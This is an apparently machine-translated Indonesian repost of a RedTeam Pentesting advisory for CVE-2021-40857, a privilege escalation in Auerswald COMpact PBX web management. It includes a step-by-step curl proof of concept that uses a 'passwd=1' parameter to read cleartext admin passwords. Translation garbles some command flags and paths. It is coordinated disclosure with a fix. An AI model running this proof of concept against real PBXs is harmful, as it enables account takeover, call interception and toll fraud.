Eskalasi Hak Istimewa Auerswald COMpact 8.0B

  • Whatsapp
Eskalasi Hak Istimewa Auerswald COMpact 8.0B

News.nextcloud.asia

Nasihat: Eskalasi Hak Istimewa Auerswald COMpact

RedTeam Pentesting menemukan kerentanan di web-based
antarmuka manajemen Auerswald COMpact 5500R PBX yang memungkinkan
pengguna dengan hak istimewa rendah untuk mengakses kata sandi akun pengguna administratif.

rincian
=======

Produk: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19″), COMmander Basic.2(19 “)
Versi yang Terpengaruh: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
Versi Tetap: 8.2B
Jenis Kerentanan: Eskalasi Hak Istimewa
Risiko Keamanan: tinggi
URL Penjual: https://www.auerswald.de/en/product/compact-5500r
Status Vendor: versi tetap dirilis
URL Saran: https://www.redteam-pentesting.de/advisories/rt-sa-2021-005
Status Penasehat: diterbitkan
CVE: CVE-2021-40857
URL CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40857

pengantar
==============

“Alat VoIP yang sepenuhnya modular untuk proses komunikasi yang lebih efisien
Dengan COMpact 5500R, Anda awalnya dilengkapi untuk sehari-hari
bisnis – sekarang dan di masa depan.

Arsitektur sepenuhnya modular dengan 80 saluran IP dan semua fungsi
dari server ITC besar memungkinkan hingga 112 pelanggan dan dengan demikian skala dengan
perusahaan Anda.

Pemeliharaan dan perluasan berkelanjutan dari perangkat lunak sistem membuat ini
server IP serbaguna, investasi masa depan dalam bisnis apa pun
komunikasi.”

(dari beranda vendor)

Keterangan lebih lanjut
==============

Penyerang dengan akun pengguna dengan hak istimewa rendah, misalnya mereka yang
digunakan oleh telepon VoIP, dapat masuk ke antarmuka manajemen berbasis web dari
yang COMpact 5500R PBX. Setelah itu, daftar akun pengguna dapat
terdaftar dan detail ditampilkan untuk setiap akun pengguna. Menambahkan parameter URL
“passwd=1” kemudian juga menyertakan kata sandi teks yang jelas untuk setiap pengguna
akun, termasuk akun administratif, yang kemudian dapat digunakan untuk
otentikasi terhadap antarmuka manajemen.

Bukti dari konsep
==================

Keriting klien HTTP baris perintah[1] dapat digunakan sebagai berikut untuk masuk
dengan nama pengguna “123” dan kata sandi “rahasia” (disingkat dan
diformat untuk meningkatkan keterbacaan):

————————————————– ———————–
$ curl –anyauth –user 123:secret –include https://192.168.1.2/tree

HTTP/1.1 200 Oke
Tipe-Konten: aplikasi/json; rangkaian karakter=utf-8;
Set-Cookie: AUERSessionID1234123412=SNKIFTVQBGRDRFJB; Hanya Http; Jalur =/
[…]

[
{
“login”: 1,
“userId”: 1234,
“userRufNr”: “123”,
“userName”: “123”,
“pbxType”: 35,
“pbxId”: 0,
“pbx”: “COMpact 5500R”,
“pbxEdit”: “Comp.5500R”,
“isActivated”: 1,
“dongleTnCount”: 112,
“currentConfig”: 34,
“cur”: “EUR”,
“language”: 0,
“hidePrivat”: 1,
“offlineConfig”: false
},
[…]
]
————————————————– ———————–

Server mengembalikan dokumen JSON yang menjelaskan akun pengguna juga
sebagai ID sesi dalam cookie. ID sesi ini kemudian dapat digunakan untuk mengakses
titik akhir API lainnya di PBX. Daftar berikut menunjukkan permintaan untuk
jalur “/ logstatus_state”, yang mengembalikan tingkat akses saat ini:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=SNKIFTVQBGRDRFJB’ –termasuk
https://192.168.1.2/logstatus_state

HTTP/1.1 200 Oke
Tipe-Konten: aplikasi/json; rangkaian karakter=utf-8;
[…]

{“logstatus”: “Peserta”}
————————————————– ———————–

Tingkat akses dalam hal ini adalah “Teilnehmer” (anggota).

Daftar semua pengguna lain dapat diminta sebagai berikut:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=SNKIFTVQBGRDRFJB’ –termasuk
https://192.168.1.2/cfg_data_teilnehmer

HTTP/1.1 200 Oke
Tipe-Konten: aplikasi/json; rangkaian karakter=utf-8;
[…]

[
[…]
{“id”:1234,”nr”:”123″,”name”:”Contoh Pengguna”,”isSubAdmin”:false},
[…]
{“id”:2222,”nr”:”555″,”name”:”sub-admin pengguna lain”,”isSubAdmin”:true}
[…]
]
————————————————– ———————–

Dua akun pengguna ditampilkan dalam daftar di atas: akun pengguna saat ini
akun dengan ID 1234 dan akun pengguna yang berbeda dengan yang disebut
hak istimewa “sub-admin” dengan ID 2222.

Detail tentang akun pengguna tertentu dengan ID yang diberikan dapat diminta
seperti ini:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=SNKIFTVQBGRDRFJB’ –termasuk
‘https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234’

HTTP/1.1 200 Oke
Tipe-Konten: aplikasi/json; rangkaian karakter=utf-8;
[…]

{“rufnr”:”123″,”name”:”Contoh Pengguna”,[…],
“privatPin”:”XXXXXX”,”privatPass”:”XXXXXXXXXX”,”privatToken”:”XXXXXXXXXX”,
[…], “isSubadmin”:0,[…]}
————————————————– ———————–

Dalam dokumen JSON yang dikembalikan, nilai bidang untuk PIN,
token dan kata sandi diganti dengan “XXX”. Tetapi jika parameter URL
“passwd” disetel ke nilai 1, nilai dikembalikan dalam teks biasa:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=SNKIFTVQBGRDRFJB’ –termasuk
‘https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234&passwd=1’

HTTP/1.1 200 Oke
Tipe-Konten: aplikasi/json; rangkaian karakter=utf-8;
[…]

{“rufnr”:”123″,”name”:”Contoh Pengguna”,[…],
“privatPin”:”12345678″,”privatPass”:”sandi rahasia”,
“privatToken”: “yyyyyyyyyyyy”,[…], “isSubadmin”:0,[…]}
————————————————– ———————–

Ini dapat diulang untuk akun pengguna lain, misalnya untuk
akun pengguna dengan ID 2222 menunjukkan daftar sebelumnya. server
mengembalikan kata sandi teks biasa untuk akun pengguna lain:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=SNKIFTVQBGRDRFJB’ –termasuk
‘https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=2222&passwd=1

HTTP/1.1 200 Oke
Tipe-Konten: aplikasi/json; rangkaian karakter=utf-8;
[…]

{“rufnr”:”555″,”name”:”sub-admin pengguna lain”,”privatPin”:”99999999″,
“privatPass”:”verysecretpassword”,”privatToken”:”zzzzzzzzzz”,
[…],”isSubadmin”:1,[…]}
————————————————– ———————–

Kata sandi kemudian dapat digunakan untuk masuk ke PBX dengan pengguna lain
Akun:

————————————————– ———————–
$ curl –anyauth –user sub-admin:verysecretpassword –include
https://192.168.1.2/pohon

[…]
HTTP/1.1 200 Oke
Tipe-Konten: aplikasi/json; rangkaian karakter=utf-8;
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; Hanya Http; Jalur =/
[…]

[{“login”:2,”userId”:2222,[…]}]
————————————————– ———————–

Memeriksa tingkat akses dengan ID sesi baru menunjukkan bahwa pengguna
sekarang masuk dengan akun administratif:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=ERQMMDGECSGWTII’ –termasuk
https://192.168.1.2/logstatus_state

HTTP/1.1 200 Oke
Tipe-Konten: aplikasi/json; rangkaian karakter=utf-8;
[…]

{“logstatus”: “Sub-Administrator”}%
————————————————– ———————–

Solusi
==========

Nonaktifkan atau batasi akses ke antarmuka manajemen berbasis web jika
mungkin.

Memperbaiki
===

Tingkatkan ke versi firmware yang memperbaiki kerentanan ini.

Risiko keamanan
===============

Penyerang yang telah memperoleh akses ke akun pengguna dengan hak istimewa rendah, untuk
contoh dengan mengekstrak akun seperti itu dari telepon VoIP, dapat masuk ke
antarmuka manajemen berbasis web dari COMpact 5500R PBX dan akses
kata sandi teks yang jelas untuk akun pengguna lain, termasuk yang memiliki
hak istimewa “sub-admin”. Setelah masuk dengan yang baru diperoleh ini
kredensial, penyerang dapat mengakses pengaturan konfigurasi dan sebagian besar lainnya
fungsi.

Misalnya, mereka dapat membuat kredensial SIP baru dan menggunakannya untuk
hubungi saluran telepon tarif premium yang mereka operasikan untuk menghasilkan pendapatan. Mereka bisa
memantau dan bahkan mengalihkan semua panggilan telepon masuk dan keluar dan
merekam semua lalu lintas data Ethernet.

Karena konsekuensi yang parah dan berjangkauan luas dan meskipun
prasyarat harus mengetahui akun pengguna dengan hak istimewa rendah yang ada,
kerentanan ini dinilai sebagai risiko tinggi.

Linimasa
========

2021-08-26 Kerentanan teridentifikasi
2021-09-01 Pelanggan menyetujui pengungkapan kepada vendor
2021-09-10 Vendor diberitahu
2021-09-10 ID CVE diminta
2021-09-10 ID CVE ditetapkan
2021-10-05 Vendor menyediakan akses ke perangkat dengan firmware tetap
2021-10-11 Vendor menyediakan firmware tetap
2021-10-15 RedTeam Pentesting memeriksa perangkat, kerentanan tampaknya diperbaiki
2021-12-06 Saran diterbitkan

Referensi
==========

[1] https://curl.se/

RedTeam Pentesting GmbH
=========================

RedTeam Pentesting menawarkan tes penetrasi individu yang dilakukan oleh a
tim ahli keamanan TI khusus. Dengan ini, kelemahan keamanan di
jaringan atau produk perusahaan terbongkar dan dapat segera diperbaiki.

Karena hanya ada sedikit ahli di bidang ini, RedTeam Pentesting ingin
berbagi pengetahuan dan meningkatkan pengetahuan publik dengan penelitian di
bidang yang berhubungan dengan keamanan. Hasilnya tersedia untuk umum
nasihat keamanan.

Informasi lebih lanjut tentang RedTeam Pentesting dapat ditemukan di:
https://www.redteam-pentesting.de/

Bekerja di RedTeam Pentesting
===============================

RedTeam Pentesting mencari penguji penetrasi untuk bergabung dengan tim kami
di Aachen, Jerman. Jika anda berminat silahkan kunjungi :
https://www.redteam-pentesting.de/jobs/


RedTeam Pentesting GmbH Telp.: +49 241 510081-0
Dennewartstr. 25-27 Faks : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Pengadilan pendaftaran Jerman: Aachen HRB 14004
Direktur pelaksana: Patrick Hof, Jens Liebchen

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.